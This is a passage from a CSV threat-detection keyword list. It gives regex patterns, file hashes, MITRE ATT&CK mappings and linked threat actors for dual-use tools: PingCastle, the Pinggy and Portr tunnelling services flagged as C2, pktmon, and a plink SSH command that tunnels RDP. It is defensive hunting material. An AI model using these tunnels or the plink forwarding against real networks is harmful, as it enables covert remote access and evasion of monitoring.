scan Vulnerability scanner","T1016 - T1069.002 - 
T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*efb4c1b4ea3b74fcab1947c248122f03cf95df33b17b8d635d3a50c3a91726d1*",".{0,1000}efb4c1b4ea3b74fcab1947c248122f03cf95df33b17b8d635d3a50c3a91726d1.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*f681c61359c401aaad1cfd8b0e884a91f59499cb1347a42d9f4d4285e722dc29*",".{0,1000}f681c61359c401aaad1cfd8b0e884a91f59499cb1347a42d9f4d4285e722dc29.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*f813c9c83c7dabb18c93222073f548d1b7bb39d5ed580011cebc9fb34ea3060c*",".{0,1000}f813c9c83c7dabb18c93222073f548d1b7bb39d5ed580011cebc9fb34ea3060c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*f9c6e9fef6d2fd03cb701bd047dcb58c0949f13af975b081346cb14afad8c2aa*",".{0,1000}f9c6e9fef6d2fd03cb701bd047dcb58c0949f13af975b081346cb14afad8c2aa.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability 
scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*netwrix/pingcastle*",".{0,1000}netwrix\/pingcastle.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*NullSessionScanner.*",".{0,1000}NullSessionScanner\..{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*pingcastle*",".{0,1000}pingcastle.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.pingcastle.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*PingCastle.Contact@netwrix.com*",".{0,1000}PingCastle\.Contact\@netwrix\.com.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#email","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" 
"*PingCastle.cs*",".{0,1000}PingCastle\.cs.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","0","N/A","N/A","10","","N/A","","","" "*PingCastle.exe*",".{0,1000}PingCastle\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","","" "*PingCastle.Scanners*",".{0,1000}PingCastle\.Scanners.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*pingcastlecloud.exe*",".{0,1000}pingcastlecloud\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability 
scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*PingCastleReporting.exe*",".{0,1000}PingCastleReporting\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*RemoteScanner.exe*",".{0,1000}RemoteScanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","","" "*ROCAVulnerabilityTester*",".{0,1000}ROCAVulnerabilityTester.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","","" "*SmbScanner.exe*",".{0,1000}SmbScanner\.exe.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca 
Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","","" "*UserAgent*PingCastleAutoUpdater*",".{0,1000}UserAgent.{0,1000}PingCastleAutoUpdater.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#useragent","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*ZeroLogonScanner.*",".{0,1000}ZeroLogonScanner\..{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","10","","N/A","","","" "* a.pinggy.io*",".{0,1000}\sa\.pinggy\.io.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. 
Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.a.pinggy.online*",".{0,1000}\.a\.pinggy\.online.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.free.pinggy.online*",".{0,1000}\.free\.pinggy\.online.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/a.pinggy.io*",".{0,1000}\/a\.pinggy\.io.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*@a.pinggy.io*",".{0,1000}\@a\.pinggy\.io.{0,1000}","greyware_tool_keyword","pinggy","Create HTTP/TCP or TLS tunnels to your Mac/PC. 
Even if it is sitting behind firewalls and NATs.","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://pinggy.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*pktmon start*",".{0,1000}pktmon\sstart.{0,1000}","greyware_tool_keyword","pktmon","pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*plink -N -L *:localhost:3389 *",".{0,1000}plink\s\-N\s\-L\s.{0,1000}\:localhost\:3389\s.{0,1000}","greyware_tool_keyword","plink","creates an SSH tunnel from the local machine to the remote machine allowing the user to connect to an RDP session on the remote machine through port 3389. This plink usage is often used by attackers","T1573 - T1021.004 - T1213.002","TA0010 - TA0011 - TA0008","N/A","BlackCat - PLAY - LockBit - Scattered Spider*","Persistence","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "* on http://localhost:7777*",".{0,1000}\son\shttp\:\/\/localhost\:7777.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "* Portr inspector running on *",".{0,1000}\sPortr\sinspector\srunning\son\s.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "* 
portr.exe*",".{0,1000}\sportr\.exe.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/amalshaji/portr-admin/*",".{0,1000}\/amalshaji\/portr\-admin\/.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/bin/portr*",".{0,1000}\/bin\/portr.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr.exe*",".{0,1000}\/portr\.exe.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr.git*",".{0,1000}\/portr\.git.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr/releases*",".{0,1000}\/portr\/releases.{0,1000}","greyware_tool_keyword","Portr","Portr is 
a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr_*_Darwin_arm64.zip*",".{0,1000}\/portr_.{0,1000}_Darwin_arm64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr_*_Darwin_x86_64.zip*",".{0,1000}\/portr_.{0,1000}_Darwin_x86_64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr_*_Linux_arm64.zip*",".{0,1000}\/portr_.{0,1000}_Linux_arm64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr_*_Linux_x86_64.zip*",".{0,1000}\/portr_.{0,1000}_Linux_x86_64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*/portr_*_Windows_arm64.zip*",".{0,1000}\/portr_.{0,1000}_Windows_arm64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr_*_Windows_x86_64.zip*",".{0,1000}\/portr_.{0,1000}_Windows_x86_64\.zip.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*/portr_admin/*.py*",".{0,1000}\/portr_admin\/.{0,1000}\.py.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","1","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*\portr.exe*",".{0,1000}\\portr\.exe.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*\portr-main\*",".{0,1000}\\portr\-main\\.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","N/A","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*04aeff8ca9ced185a7f1e860e046fcfbf47b5345d4480b3015937978fe2d2ecb*",".{0,1000}04aeff8ca9ced185a7f1e860e046fcfbf47b5345d4480b3015937978fe2d2ecb.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*0927710fe2ab1e73a1797de36da9ada6322b8ac8ce473fc2db3a8b70b3ce141b*",".{0,1000}0927710fe2ab1e73a1797de36da9ada6322b8ac8ce473fc2db3a8b70b3ce141b.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*0c6710b58b9054fd232c624dae29020bc765c962ae095a3eb53a0981379689b8*",".{0,1000}0c6710b58b9054fd232c624dae29020bc765c962ae095a3eb53a0981379689b8.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*0f3a3f091d06f67f44077711477c0908a957f161d178d9ad8942fee864ed7a29*",".{0,1000}0f3a3f091d06f67f44077711477c0908a957f161d178d9ad8942fee864ed7a29.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*1350cbc251898cdd6fc09f6ac24ff69b68ddb95ea71379dee9f598a62b484430*",".{0,1000}1350cbc251898cdd6fc09f6ac24ff69b68ddb95ea71379dee9f598a62b484430.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*1c76ba5931eda89deb05158b1abbac7f740a594509f3620c52fa66287a5e7a6e*",".{0,1000}1c76ba5931eda89deb05158b1abbac7f740a594509f3620c52fa66287a5e7a6e.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*1d57d63ec9e3ec8fb3b527132e6603c81d8bdea62141c25c29e7d9e24b026e9f*",".{0,1000}1d57d63ec9e3ec8fb3b527132e6603c81d8bdea62141c25c29e7d9e24b026e9f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*224de67abbba2df8eb17aa567bb2b3be029ad21e4203692b6abb73628e75db02*",".{0,1000}224de67abbba2df8eb17aa567bb2b3be029ad21e4203692b6abb73628e75db02.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*34b5107c27cbae4cab4addfece8236d168102d7d6cc3ee93d29bf4d4b550065c*",".{0,1000}34b5107c27cbae4cab4addfece8236d168102d7d6cc3ee93d29bf4d4b550065c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*3f3be7d94aa91ed9d14a8c8f37413d2a3057c0a2758d579189c84904285007d5*",".{0,1000}3f3be7d94aa91ed9d14a8c8f37413d2a3057c0a2758d579189c84904285007d5.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*451d8fa3adce80028ea451e1ddf7a185ea4a3329aae156bf40fdda5d1ac60c84*",".{0,1000}451d8fa3adce80028ea451e1ddf7a185ea4a3329aae156bf40fdda5d1ac60c84.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*466869834998e6668cf4b7e73ed043c145c73c5a62e21d1bbf1ebf7cde3f86bd*",".{0,1000}466869834998e6668cf4b7e73ed043c145c73c5a62e21d1bbf1ebf7cde3f86bd.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*48ef85a7f6eea1b650affacb62f046eca8a965f134482ff808e4a148a69e72b5*",".{0,1000}48ef85a7f6eea1b650affacb62f046eca8a965f134482ff808e4a148a69e72b5.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*4bc1b107cd497c88dfbc262ff7bcae4e85874848df0435bb7ecb8334f23b19b3*",".{0,1000}4bc1b107cd497c88dfbc262ff7bcae4e85874848df0435bb7ecb8334f23b19b3.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*4d797b16f3aa81a13bc1736b37e783336bcfb9a538148810b3d1ec8fe592e50c*",".{0,1000}4d797b16f3aa81a13bc1736b37e783336bcfb9a538148810b3d1ec8fe592e50c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*51f4ff1014c223e9f936e13e8d053dddb16678c65e87b2cfa63cad36564d243c*",".{0,1000}51f4ff1014c223e9f936e13e8d053dddb16678c65e87b2cfa63cad36564d243c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*54538a9a0676b8d5bb23c42250df271b736052c1f5b7168a73c14bc65aa017dc*",".{0,1000}54538a9a0676b8d5bb23c42250df271b736052c1f5b7168a73c14bc65aa017dc.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*5757b774c407cc8a6ce5f9601b244730635a30efcb0015fe454610850b14d38d*",".{0,1000}5757b774c407cc8a6ce5f9601b244730635a30efcb0015fe454610850b14d38d.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*5b036a1f20522f45ddfe9956f4014efe311daed29a6888959f0822ff72da948f*",".{0,1000}5b036a1f20522f45ddfe9956f4014efe311daed29a6888959f0822ff72da948f.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*61924a52c149b6ad50e462cebbdfc14c570293abdf1c97bddfe7c0c7580ada31*",".{0,1000}61924a52c149b6ad50e462cebbdfc14c570293abdf1c97bddfe7c0c7580ada31.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 
"*673de62a71e95d4b855f3a8c616edbe2b51f066625cdef9924c76a1f021a660c*",".{0,1000}673de62a71e95d4b855f3a8c616edbe2b51f066625cdef9924c76a1f021a660c.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" "*6db7f9491dc7389e6f64cd4ae549eb3a304b1868309a40b7a175c0206c681bc9*",".{0,1000}6db7f9491dc7389e6f64cd4ae549eb3a304b1868309a40b7a175c0206c681bc9.{0,1000}","greyware_tool_keyword","Portr","Portr is a tunnel solution that allows you to expose local http, tcp or websocket connections to the public internet","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/amalshaji/portr","1","0","#filehash","N/A","10","10","2233","63","2024-08-18T12:48:24Z","2023-11-21T11:14:01Z" 